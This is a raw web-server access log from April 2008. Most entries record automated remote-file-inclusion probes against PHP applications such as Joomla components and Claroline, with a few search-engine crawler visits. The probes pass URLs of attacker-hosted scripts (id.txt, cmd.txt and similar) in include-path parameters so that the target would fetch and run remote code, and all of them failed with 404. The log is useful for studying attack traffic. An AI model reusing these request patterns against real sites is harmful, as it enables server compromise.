82.198.80.33 - - [13/Apr/2008:20:03:52 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.63"
217.11.249.88 - - [13/Apr/2008:20:05:36 -0600] "GET /logs/access_log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://g0tcha.fileave.com/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
216.17.101.27 - - [13/Apr/2008:20:05:37 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
216.17.101.27 - - [13/Apr/2008:20:05:38 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
62.75.143.93 - - [13/Apr/2008:20:05:41 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
62.75.143.93 - - [13/Apr/2008:20:05:43 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
62.75.143.93 - - [13/Apr/2008:20:05:46 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
67.195.52.56 - - [13/Apr/2008:20:06:41 -0600] "GET /?S=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
24.172.171.18 - - [13/Apr/2008:20:11:09 -0600] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
24.172.171.18 - - [13/Apr/2008:20:11:11 -0600] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.sohbetsuper.org/modules/shoutbox/box?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
122.70.138.28 - - [13/Apr/2008:20:11:48 -0600] "GET /logs/access_log/atom.php5?page=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.808"
122.70.138.28 - - [13/Apr/2008:20:11:49 -0600] "GET /atom.php5?page=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.808"
122.70.138.28 - - [13/Apr/2008:20:11:50 -0600] "GET /logs/atom.php5?page=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.808"
67.195.54.51 - - [13/Apr/2008:20:13:10 -0600] "GET /?S=D HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.93.203.42 - - [13/Apr/2008:20:13:18 -0600] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://h1.ripway.com/ksatri4/xx?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.93.203.42 - - [13/Apr/2008:20:13:18 -0600] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://h1.ripway.com/ksatri4/xx?? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
205.234.193.162 - - [13/Apr/2008:20:13:32 -0600] "GET /logs/error_log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan7?? HTTP/1.1" 404 285 "-" "libwww-perl/5.808"
205.234.193.162 - - [13/Apr/2008:20:13:32 -0600] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
205.234.193.162 - - [13/Apr/2008:20:13:32 -0600] "GET /logs/access_log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan7?? HTTP/1.1" 404 286 "-" "libwww-perl/5.808"
90.158.114.6 - - [13/Apr/2008:20:23:30 -0600] "GET /logs/access_log.20080127/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.800"
90.158.114.6 - - [13/Apr/2008:20:23:31 -0600] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.800"
90.158.114.6 - - [13/Apr/2008:20:23:31 -0600] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.800"
90.158.114.6 - - [13/Apr/2008:20:23:36 -0600] "GET /logs/access_log.20080127/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.800"
90.158.114.6 - - [13/Apr/2008:20:23:36 -0600] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.800"
90.158.114.6 - - [13/Apr/2008:20:23:36 -0600] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.800"
87.230.7.194 - - [13/Apr/2008:20:26:57 -0600] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://211.233.58.69/~seocholaw/bbs/test?? HTTP/1.1" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
87.230.7.194 - - [13/Apr/2008:20:26:57 -0600] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://211.233.58.69/~seocholaw/bbs/test?? HTTP/1.1" 404 251 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
72.30.216.89 - - [13/Apr/2008:20:27:16 -0600] "GET /logs/access_log HTTP/1.0" 200 55499 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.113.108.77 - - [13/Apr/2008:20:30:16 -0600] "GET /logs/access_log.20080127/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
213.113.108.77 - - [13/Apr/2008:20:30:16 -0600] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
213.113.108.77 - - [13/Apr/2008:20:30:16 -0600] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
87.208.24.99 - - [13/Apr/2008:20:31:57 -0600] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.208.24.99 - - [13/Apr/2008:20:31:57 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
88.167.21.85 - - [13/Apr/2008:20:33:27 -0600] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
88.167.21.85 - - [13/Apr/2008:20:33:27 -0600] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.230.7.194 - - [13/Apr/2008:20:34:34 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://211.233.58.69/~seocholaw/bbs/test?? HTTP/1.1" 404 264 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
87.230.7.194 - - [13/Apr/2008:20:34:34 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://211.233.58.69/~seocholaw/bbs/test?? HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
201.134.249.164 - - [13/Apr/2008:20:34:35 -0600] "GET /logs/access_log//modules/TotalCalendar/about.php?inc_dir=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
201.134.249.164 - - [13/Apr/2008:20:34:35 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
201.134.249.164 - - [13/Apr/2008:20:34:36 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
74.53.240.146 - - [13/Apr/2008:20:35:49 -0600] "GET /logs/access_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 288 "-" "libwww-perl/5.79"
74.53.240.146 - - [13/Apr/2008:20:35:49 -0600] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
74.53.240.146 - - [13/Apr/2008:20:35:49 -0600] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
74.53.240.146 - - [13/Apr/2008:20:36:20 -0600] "GET /logs/error_log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
209.92.158.55 - - [13/Apr/2008:20:38:27 -0600] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.92.158.55 - - [13/Apr/2008:20:38:31 -0600] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.240.146 - - [13/Apr/2008:20:38:49 -0600] "GET /logs/access_log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
74.53.240.146 - - [13/Apr/2008:20:38:49 -0600] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
74.53.240.146 - - [13/Apr/2008:20:38:49 -0600] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
74.53.240.146 - - [13/Apr/2008:20:39:01 -0600] "GET /logs/error_log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
222.236.47.176 - - [13/Apr/2008:20:40:31 -0600] "GET /index.php?option=com_ewriting&link=&action=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.236.47.176 - - [13/Apr/2008:20:40:31 -0600] "GET /logs/index.php?option=com_ewriting&link=&action=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.246.21.243 - - [13/Apr/2008:20:40:36 -0600] "GET /index.php?pagename=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.246.21.243 - - [13/Apr/2008:20:40:36 -0600] "GET /logs/index.php?pagename=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
213.215.223.191 - - [13/Apr/2008:20:40:56 -0600] "GET /logs//com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.215.223.191 - - [13/Apr/2008:20:40:56 -0600] "GET //com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.55.208.116 - - [13/Apr/2008:20:41:40 -0600] "GET /robots.txt HTTP/1.1" 404 216 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.116 - - [13/Apr/2008:20:41:40 -0600] "GET /logs/error_log.20071202 HTTP/1.1" 404 229 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.25.144.182 - - [13/Apr/2008:20:41:56 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 246 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
85.25.144.182 - - [13/Apr/2008:20:41:57 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 241 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
208.71.129.241 - - [13/Apr/2008:20:49:06 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.71.129.241 - - [13/Apr/2008:20:49:06 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
217.195.114.88 - - [13/Apr/2008:20:49:15 -0600] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.195.114.88 - - [13/Apr/2008:20:49:15 -0600] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
70.87.240.50 - - [13/Apr/2008:20:51:34 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
70.87.240.50 - - [13/Apr/2008:20:51:34 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
217.195.114.88 - - [13/Apr/2008:20:51:55 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
217.195.114.88 - - [13/Apr/2008:20:51:55 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
217.195.114.88 - - [13/Apr/2008:20:51:58 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
217.195.114.88 - - [13/Apr/2008:20:51:58 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
74.52.130.178 - - [13/Apr/2008:20:53:08 -0600] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
64.34.173.70 - - [13/Apr/2008:20:53:12 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
64.34.173.70 - - [13/Apr/2008:20:53:12 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
74.52.130.178 - - [13/Apr/2008:20:53:16 -0600] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.200.207.18 - - [13/Apr/2008:20:53:20 -0600] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:20:53:20 -0600] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
69.89.27.217 - - [13/Apr/2008:20:53:38 -0600] "GET /logs/access_log.20080316//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
69.89.27.217 - - [13/Apr/2008:20:53:38 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
69.89.27.217 - - [13/Apr/2008:20:53:38 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
74.200.207.18 - - [13/Apr/2008:20:54:23 -0600] "GET /logs/error_log.20080330//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:20:54:23 -0600] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:20:54:23 -0600] "GET /logs//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
216.97.43.58 - - [13/Apr/2008:20:54:24 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:20:54:24 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:20:54:24 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:20:54:24 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:20:54:24 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:20:54:24 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
77.92.68.25 - - [13/Apr/2008:20:54:30 -0600] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
77.92.68.25 - - [13/Apr/2008:20:54:31 -0600] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 244 "-" "libwww-perl/5.808"
69.89.27.217 - - [13/Apr/2008:20:54:31 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
74.200.207.18 - - [13/Apr/2008:20:56:07 -0600] "GET /logs/access_log.20080330//include.php?path[docroot]=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:20:56:07 -0600] "GET //include.php?path[docroot]=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:20:56:07 -0600] "GET /logs//include.php?path[docroot]=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
74.200.207.18 - - [13/Apr/2008:20:56:22 -0600] "GET /logs/error_log.20080330//include.php?path[docroot]=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
69.93.107.242 - - [13/Apr/2008:20:56:27 -0600] "GET /logs/error_log.20080330//modules/vwar/admin/admin.php?vwar_root=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.810"
69.93.107.242 - - [13/Apr/2008:20:56:27 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
69.93.107.242 - - [13/Apr/2008:20:56:27 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.holeshot.co.nz/id.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
69.89.27.217 - - [13/Apr/2008:20:56:44 -0600] "GET /logs/error_log//admin/business_inc/saveserver.php?thisdir=http://bnb-chambresdhotes.ch///components/com_easygallery/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
77.92.68.25 - - [13/Apr/2008:20:59:15 -0600] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
77.92.68.25 - - [13/Apr/2008:20:59:15 -0600] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
208.71.129.241 - - [13/Apr/2008:21:00:57 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.71.129.241 - - [13/Apr/2008:21:00:57 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
216.97.43.58 - - [13/Apr/2008:21:01:56 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:01:57 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
85.25.144.182 - - [13/Apr/2008:21:03:37 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
85.25.144.182 - - [13/Apr/2008:21:03:37 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
87.106.213.181 - - [13/Apr/2008:21:04:31 -0600] "GET /logs/index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.106.213.181 - - [13/Apr/2008:21:04:31 -0600] "GET /index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.106.213.181 - - [13/Apr/2008:21:04:33 -0600] "GET /logs/index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.106.213.181 - - [13/Apr/2008:21:04:33 -0600] "GET /index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
87.106.213.181 - - [13/Apr/2008:21:04:33 -0600] "GET /logs/index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.106.213.181 - - [13/Apr/2008:21:04:34 -0600] "GET /index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
74.200.207.18 - - [13/Apr/2008:21:05:31 -0600] "GET /logs/access_log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
87.106.213.181 - - [13/Apr/2008:21:05:46 -0600] "GET /logs/homepage.php?sel=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.213.181 - - [13/Apr/2008:21:05:46 -0600] "GET /homepage.php?sel=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
212.241.218.41 - - [13/Apr/2008:21:05:49 -0600] "GET /logs/index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
212.241.218.41 - - [13/Apr/2008:21:05:50 -0600] "GET /index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
83.172.150.11 - - [13/Apr/2008:21:06:06 -0600] "GET /logs/homepage.php?sel=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
